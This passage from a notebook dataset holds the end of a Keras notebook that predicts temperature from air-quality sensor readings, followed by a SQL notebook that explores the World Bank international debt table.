train_features.pop('temp')\ntest_labels = test_features.pop('temp')\n\n\n\ntrain_labels\n\ntrain_data = train_data.drop(['temp'], axis=1)\ntest_data = test_data.drop(['temp'], axis=1)\n\nprint(test_data)\n\n# train_dataset_timeseries = keras.preprocessing.timeseries_dataset_from_array(train_data, train_labels, sequence_length=len(train_data))\n# TimeSeries", " tvoc_ppm altitude pressure hum tvoc_co2\ntimestamp \n2021-12-02 6 148 99621 37 185\n2021-12-02 3 147 99624 38 166\n2021-12-02 8 142 99682 36 198\n2021-12-02 3 148 99615 37 168\n2021-12-01 7 156 99526 40 194\n2021-12-01 134 160 99480 40 1\n2021-12-02 3 148 99621 37 166\n2021-12-02 1 143 99679 36 155\n2021-12-02 3 147 99633 36 170\n2021-12-02 5 146 99635 38 182\n2021-12-01 105 160 99483 41 66\n2021-12-01 14 157 99515 39 239\n" ], [ "train_stat = train_data.describe().transpose()[['mean', 'std']]\ntrain_stat", "_____no_output_____" ] ], [ [ "#Normalization\n***Normalizing is helpful to bound data between the range from 0 to 1***", "_____no_output_____" ] ], [ [ "def normalize(row):\n # t = row['timestamp']\n \n\n answer = (row - train_stat['mean']) / train_stat['std']\n print(row, answer)\n # answer['timestamp'] = t\n \n return answer\n\nnormed_train = normalize(train_data)\nnormed_test = normalize(test_data)\n\nprint(normed_test)\n\n\n\nnormed_train = np.asarray(normed_train).astype(np.float32)\nnormed_test = np.asarray(normed_test).astype(np.float32)\n\n# normed_train\n# normed_test\ntrain_labels", " tvoc_ppm altitude pressure hum tvoc_co2\ntimestamp \n2021-12-02 6 148 99621 37 185\n2021-12-02 3 147 99624 38 166\n2021-12-02 8 142 99682 36 198\n2021-12-02 3 148 99615 37 168\n2021-12-01 7 156 99526 40 194\n2021-12-01 134 160 99480 40 1\n2021-12-02 3 148 99621 37 166\n2021-12-02 1 143 99679 36 155\n2021-12-02 3 147 99633 36 170\n2021-12-02 5 146 99635 38 182\n2021-12-01 105 160 99483 41 66\n2021-12-01 14 157 99515 39 239\n2021-12-02 1 148 99618 37 151\n2021-12-02 5 147 99635 37 182\n2021-12-02 1 148 99621 36 157\n2021-12-02 3 146 99636 37 164\n2021-12-02 2 146 99645 36 159\n2021-12-01 59 159 99497 40 25\n2021-12-02 1 152 99580 37 151\n2021-12-02 1 148 99616 37 155\n2021-12-02 4 146 99637 36 171\n2021-12-02 2 148 99613 37 160\n2021-12-02 4 146 99638 37 176\n2021-12-02 1 145 99663 36 153\n2021-12-02 3 149 99608 37 169\n2021-12-02 1 144 99658 36 157\n2021-12-02 4 148 99617 37 171\n2021-12-02 1 150 99592 37 155\n2021-12-01 83 160 99485 41 183\n2021-12-02 1 148 99616 37 151 tvoc_ppm altitude pressure hum tvoc_co2\ntimestamp \n2021-12-02 -0.287616 -0.257977 0.309777 -0.284314 0.617113\n2021-12-02 -0.377186 -0.451459 0.361311 0.371796 0.212798\n2021-12-02 -0.227904 -1.418871 1.357636 -0.940424 0.893750\n2021-12-02 -0.377186 -0.257977 0.206709 -0.284314 0.255357\n2021-12-01 -0.257760 1.289883 -1.322135 1.684015 0.808631\n2021-12-01 3.534000 2.063813 -2.112324 1.684015 -3.298362\n2021-12-02 -0.377186 -0.257977 0.309777 -0.284314 0.212798\n2021-12-02 -0.436898 -1.225389 1.306102 -0.940424 -0.021280\n2021-12-02 -0.377186 -0.451459 0.515913 -0.940424 0.297917\n2021-12-02 -0.317473 -0.644941 0.550269 0.371796 0.553274\n2021-12-01 2.668165 2.063813 -2.060790 2.340125 -1.915178\n2021-12-01 -0.048765 1.483365 -1.511093 1.027905 1.766219\n2021-12-02 -0.436898 -0.257977 0.258243 -0.284314 -0.106399\n2021-12-02 -0.317473 -0.451459 0.550269 -0.284314 0.553274\n2021-12-02 -0.436898 -0.257977 0.309777 -0.940424 0.021280\n2021-12-02 -0.377186 -0.644941 0.567447 -0.284314 0.170238\n2021-12-02 -0.407042 -0.644941 0.722049 -0.940424 0.063839\n2021-12-01 1.294772 1.870330 -1.820298 1.684015 -2.787647\n2021-12-02 -0.436898 0.515953 -0.394522 -0.284314 -0.106399\n2021-12-02 -0.436898 -0.257977 0.223887 -0.284314 -0.021280\n2021-12-02 -0.347329 -0.644941 0.584625 -0.940424 0.319196\n2021-12-02 -0.407042 -0.257977 0.172353 -0.284314 0.085119\n2021-12-02 -0.347329 -0.644941 0.601803 -0.284314 0.425595\n2021-12-02 -0.436898 -0.838424 1.031254 -0.940424 -0.063839\n2021-12-02 -0.377186 -0.064494 0.086463 -0.284314 0.276637\n2021-12-02 -0.436898 -1.031906 0.945364 -0.940424 0.021280\n2021-12-02 -0.347329 -0.257977 0.241065 -0.284314 0.319196\n2021-12-02 -0.436898 0.128988 -0.188386 -0.284314 -0.021280\n2021-12-01 2.011325 2.063813 -2.026434 2.340125 0.574553\n2021-12-02 -0.436898 -0.257977 0.223887 -0.284314 -0.106399\n tvoc_ppm altitude pressure hum tvoc_co2\ntimestamp \n2021-12-02 6 148 99621 37 185\n2021-12-02 3 147 99624 38 166\n2021-12-02 8 142 99682 36 198\n2021-12-02 3 148 99615 37 168\n2021-12-01 7 156 99526 40 194\n2021-12-01 134 160 99480 40 1\n2021-12-02 3 148 99621 37 166\n2021-12-02 1 143 99679 36 155\n2021-12-02 3 147 99633 36 170\n2021-12-02 5 146 99635 38 182\n2021-12-01 105 160 99483 41 66\n2021-12-01 14 157 99515 39 239 tvoc_ppm altitude pressure hum tvoc_co2\ntimestamp \n2021-12-02 -0.287616 -0.257977 0.309777 -0.284314 0.617113\n2021-12-02 -0.377186 -0.451459 0.361311 0.371796 0.212798\n2021-12-02 -0.227904 -1.418871 1.357636 -0.940424 0.893750\n2021-12-02 -0.377186 -0.257977 0.206709 -0.284314 0.255357\n2021-12-01 -0.257760 1.289883 -1.322135 1.684015 0.808631\n2021-12-01 3.534000 2.063813 -2.112324 1.684015 -3.298362\n2021-12-02 -0.377186 -0.257977 0.309777 -0.284314 0.212798\n2021-12-02 -0.436898 -1.225389 1.306102 -0.940424 -0.021280\n2021-12-02 -0.377186 -0.451459 0.515913 -0.940424 0.297917\n2021-12-02 -0.317473 -0.644941 0.550269 0.371796 0.553274\n2021-12-01 2.668165 2.063813 -2.060790 2.340125 -1.915178\n2021-12-01 -0.048765 1.483365 -1.511093 1.027905 1.766219\n tvoc_ppm altitude pressure hum tvoc_co2\ntimestamp \n2021-12-02 -0.287616 -0.257977 0.309777 -0.284314 0.617113\n2021-12-02 -0.377186 -0.451459 0.361311 0.371796 0.212798\n2021-12-02 -0.227904 -1.418871 1.357636 -0.940424 0.893750\n2021-12-02 -0.377186 -0.257977 0.206709 -0.284314 0.255357\n2021-12-01 -0.257760 1.289883 -1.322135 1.684015 0.808631\n2021-12-01 3.534000 2.063813 -2.112324 1.684015 -3.298362\n2021-12-02 -0.377186 -0.257977 0.309777 -0.284314 0.212798\n2021-12-02 -0.436898 -1.225389 1.306102 -0.940424 -0.021280\n2021-12-02 -0.377186 -0.451459 0.515913 -0.940424 0.297917\n2021-12-02 -0.317473 -0.644941 0.550269 0.371796 0.553274\n2021-12-01 2.668165 2.063813 -2.060790 2.340125 -1.915178\n2021-12-01 -0.048765 1.483365 -1.511093 1.027905 1.766219\n" ] ], [ [ "#Building the model using Tensorflow Keras", "_____no_output_____" ] ], [ [ "# For building the model using function for in the future its better to create multiple models\ndef create_model():\n model = keras.Sequential([\n layers.Dense(64, activation=tf.nn.relu, input_shape=[len(train_data.keys())]),\n layers.Dense(1)\n ])\n\n optimiser = tf.keras.optimizers.RMSprop(0.001)\n model.compile(loss='mse', optimizer=optimiser, metrics=['mae', 'mse'])\n\n return model", "_____no_output_____" ], [ "model = create_model()", "_____no_output_____" ] ], [ [ "#Insights of the model", "_____no_output_____" ] ], [ [ "model.summary() # Overview of the created model", "Model: \"sequential\"\n_________________________________________________________________\n Layer (type) Output Shape Param # \n=================================================================\n dense (Dense) (None, 64) 384 \n \n dense_1 (Dense) (None, 1) 65 \n \n=================================================================\nTotal params: 449\nTrainable params: 449\nNon-trainable params: 0\n_________________________________________________________________\n" ], [ "early_block = keras.callbacks.EarlyStopping(monitor='val_loss', patience=100) # Add auto stop incase the loss is less enough.\n\n\n# Training model\nfull_model = model.fit(normed_train, train_labels, epochs=10000, validation_split=0.2, verbose=0, callbacks=[early_block]) # Actual model training", "_____no_output_____" ] ], [ [ "# Model training validation\nHow well did the model trained? How is the loss?\n", "_____no_output_____" ] ], [ [ "losses = pd.DataFrame(model.history.history)\nlosses.plot() # Plot the loss", "_____no_output_____" ] ], [ [ "## Model Testing\n", "_____no_output_____" ] ], [ [ "# Tesing the Model based on values from training X = Time , Y = Predicted temperature\ntestmodel = pd.DataFrame(model.predict(normed_test))\ntestmodel.plot()", "_____no_output_____" ], [ "# Predict what the temperature will be after x amount of days\nhowmany = 90 # 10 days\nanswer = model.predict([normed_test[0:(howmany % len(normed_test))]])\nprint(f\"The temperature would be {answer.mean()} degrees after {howmany}\")", "The temperature would be 22.158369064331055 degrees after 90\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ] ]
cb209dd17f2318667cbb24c7aacf450e8c696a5e
24,382
ipynb
Jupyter Notebook
SQL/debt.ipynb
verneh/DataSci
cbbecbd780368c2a4567aaf9ec8d66f7c7cdfa06
[ "MIT" ]
null
null
null
SQL/debt.ipynb
verneh/DataSci
cbbecbd780368c2a4567aaf9ec8d66f7c7cdfa06
[ "MIT" ]
null
null
null
SQL/debt.ipynb
verneh/DataSci
cbbecbd780368c2a4567aaf9ec8d66f7c7cdfa06
[ "MIT" ]
null
null
null
24,382
24,382
0.645968
[ [ [ "## 1. The World Bank's international debt data\n<p>It's not that we humans only take debts to manage our necessities. A country may also take debt to manage its economy. For example, infrastructure spending is one costly ingredient required for a country's citizens to lead comfortable lives. <a href=\"https://www.worldbank.org\">The World Bank</a> is the organization that provides debt to countries.</p>\n<p>In this notebook, we are going to analyze international debt data collected by The World Bank. The dataset contains information about the amount of debt (in USD) owed by developing countries across several categories. We are going to find the answers to questions like: </p>\n<ul>\n<li>What is the total amount of debt that is owed by the countries listed in the dataset?</li>\n<li>Which country owns the maximum amount of debt and what does that amount look like?</li>\n<li>What is the average amount of debt owed by countries across different debt indicators?</li>\n</ul>\n<p><img src=\"https://assets.datacamp.com/production/project_754/img/image.jpg\" alt=\"\"></p>\n<p>The first line of code connects us to the <code>international_debt</code> database where the table <code>international_debt</code> is residing. Let's first <code>SELECT</code> <em>all</em> of the columns from the <code>international_debt</code> table. Also, we'll limit the output to the first ten rows to keep the output clean.</p>", "_____no_output_____" ] ], [ [ "%%sql\npostgresql:///international_debt\n \n ", "_____no_output_____" ] ], [ [ "## 2. Finding the number of distinct countries\n<p>From the first ten rows, we can see the amount of debt owed by <em>Afghanistan</em> in the different debt indicators. But we do not know the number of different countries we have on the table. There are repetitions in the country names because a country is most likely to have debt in more than one debt indicator. </p>\n<p>Without a count of unique countries, we will not be able to perform our statistical analyses holistically. In this section, we are going to extract the number of unique countries present in the table. </p>", "_____no_output_____" ] ], [ [ "%%sql\nSELECT COUNT(DISTINCT country_name) AS total_distinct_countries\nFROM international_debt;", " * postgresql:///international_debt\n1 rows affected.\n" ] ], [ [ "## 3. Finding out the distinct debt indicators\n<p>We can see there are a total of 124 countries present on the table. As we saw in the first section, there is a column called <code>indicator_name</code> that briefly specifies the purpose of taking the debt. Just beside that column, there is another column called <code>indicator_code</code> which symbolizes the category of these debts. Knowing about these various debt indicators will help us to understand the areas in which a country can possibly be indebted to. </p>", "_____no_output_____" ] ], [ [ "%%sql\nSELECT DISTINCT indicator_code AS distinct_debt_indicators FROM international_debt ORDER BY distinct_debt_indicators;", " * postgresql:///international_debt\n25 rows affected.\n" ] ], [ [ "## 4. Totaling the amount of debt owed by the countries\n<p>As mentioned earlier, the financial debt of a particular country represents its economic state. But if we were to project this on an overall global scale, how will we approach it?</p>\n<p>Let's switch gears from the debt indicators now and find out the total amount of debt (in USD) that is owed by the different countries. This will give us a sense of how the overall economy of the entire world is holding up.</p>", "_____no_output_____" ] ], [ [ "%%sql\nSELECT ROUND(SUM(debt)/1000000, 2) AS total_debt\nFROM international_debt; ", " * postgresql:///international_debt\n1 rows affected.\n" ] ], [ [ "## 5. Country with the highest debt\n<p>\"Human beings cannot comprehend very large or very small numbers. It would be useful for us to acknowledge that fact.\" - <a href=\"https://en.wikipedia.org/wiki/Daniel_Kahneman\">Daniel Kahneman</a>. That is more than <em>3 million <strong>million</strong></em> USD, an amount which is really hard for us to fathom. </p>\n<p>Now that we have the exact total of the amounts of debt owed by several countries, let's now find out the country that owns the highest amount of debt along with the amount. <strong>Note</strong> that this debt is the sum of different debts owed by a country across several categories. This will help to understand more about the country in terms of its socio-economic scenarios. We can also find out the category in which the country owns its highest debt. But we will leave that for now. </p>", "_____no_output_____" ] ], [ [ "%%sql\nSELECT \n country_name, \n ROUND(SUM(debt),2) AS total_debt\nFROM international_debt\nGROUP BY country_name\nORDER BY total_debt DESC\nLIMIT 1;", " * postgresql:///international_debt\n1 rows affected.\n" ] ], [ [ "## 6. Average amount of debt across indicators\n<p>So, it was <em>China</em>. A more in-depth breakdown of China's debts can be found <a href=\"https://datatopics.worldbank.org/debt/ids/country/CHN\">here</a>. </p>\n<p>We now have a brief overview of the dataset and a few of its summary statistics. We already have an idea of the different debt indicators in which the countries owe their debts. We can dig even further to find out on an average how much debt a country owes? This will give us a better sense of the distribution of the amount of debt across different indicators.</p>", "_____no_output_____" ] ], [ [ "%%sql\nSELECT \n indicator_code AS debt_indicator,\n indicator_name,\n ROUND(AVG(debt),2) AS average_debt\nFROM international_debt\nGROUP BY debt_indicator, indicator_name\nORDER BY average_debt DESC\nLIMIT 10;", " * postgresql:///international_debt\n10 rows affected.\n" ] ], [ [ "## 7. The highest amount of principal repayments\n<p>We can see that the indicator <code>DT.AMT.DLXF.CD</code> tops the chart of average debt. This category includes repayment of long term debts. Countries take on long-term debt to acquire immediate capital. More information about this category can be found <a href=\"https://datacatalog.worldbank.org/principal-repayments-external-debt-long-term-amt-current-us-0\">here</a>. </p>\n<p>An interesting observation in the above finding is that there is a huge difference in the amounts of the indicators after the second one. This indicates that the first two indicators might be the most severe categories in which the countries owe their debts.</p>\n<p>We can investigate this a bit more so as to find out which country owes the highest amount of debt in the category of long term debts (<code>DT.AMT.DLXF.CD</code>). Since not all the countries suffer from the same kind of economic disturbances, this finding will allow us to understand that particular country's economic condition a bit more specifically. </p>", "_____no_output_____" ] ], [ [ "%%sql\nSELECT \n country_name, \n indicator_name, \n ROUND(debt, 2)\nFROM international_debt\nWHERE debt = (SELECT \n MAX(debt)\n FROM international_debt\n WHERE indicator_code = 'DT.AMT.DLXF.CD' );", " * postgresql:///international_debt\n1 rows affected.\n" ] ], [ [ "## 8. The most common debt indicator\n<p>China has the highest amount of debt in the long-term debt (<code>DT.AMT.DLXF.CD</code>) category. This is verified by <a href=\"https://data.worldbank.org/indicator/DT.AMT.DLXF.CD?end=2018&most_recent_value_desc=true\">The World Bank</a>. It is often a good idea to verify our analyses like this since it validates that our investigations are correct. </p>\n<p>We saw that long-term debt is the topmost category when it comes to the average amount of debt. But is it the most common indicator in which the countries owe their debt? Let's find that out. </p>", "_____no_output_____" ] ], [ [ "%%sql\nSELECT \n indicator_name,\n COUNT(indicator_code) as indicator_count\nFROM international_debt\nGROUP BY indicator_code, indicator_name\nORDER BY indicator_count DESC\nLIMIT 20;", " * postgresql:///international_debt\n20 rows affected.\n" ] ], [ [ "## 9. Other viable debt issues and conclusion\n<p>There are a total of six debt indicators in which all the countries listed in our dataset have taken debt. The indicator <code>DT.AMT.DLXF.CD</code> is also there in the list. So, this gives us a clue that all these countries are suffering from a common economic issue. But that is not the end of the story, a part of the story rather. </p>\n<p>Let's change tracks from <code>debt_indicator</code>s now and focus on the amount of debt again. Let's find out the maximum amount of debt across the indicators along with the respective country names. With this, we will be in a position to identify the other plausible economic issues a country might be going through. By the end of this section, we will have found out the debt indicators in which a country owes its highest debt. </p>\n<p>In this notebook, we took a look at debt owed by countries across the globe. We extracted a few summary statistics from the data and unraveled some interesting facts and figures. We also validated our findings to make sure the investigations are correct.</p>", "_____no_output_____" ] ], [ [ "%%sql\nSELECT \n country_name, \n indicator_code, \n round(MAX(debt),2) as maximum_debt \nFROM international_debt\nGROUP BY country_name, indicator_code\nORDER BY maximum_debt DESC\nLIMIT 10;", " * postgresql:///international_debt\n10 rows affected.\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]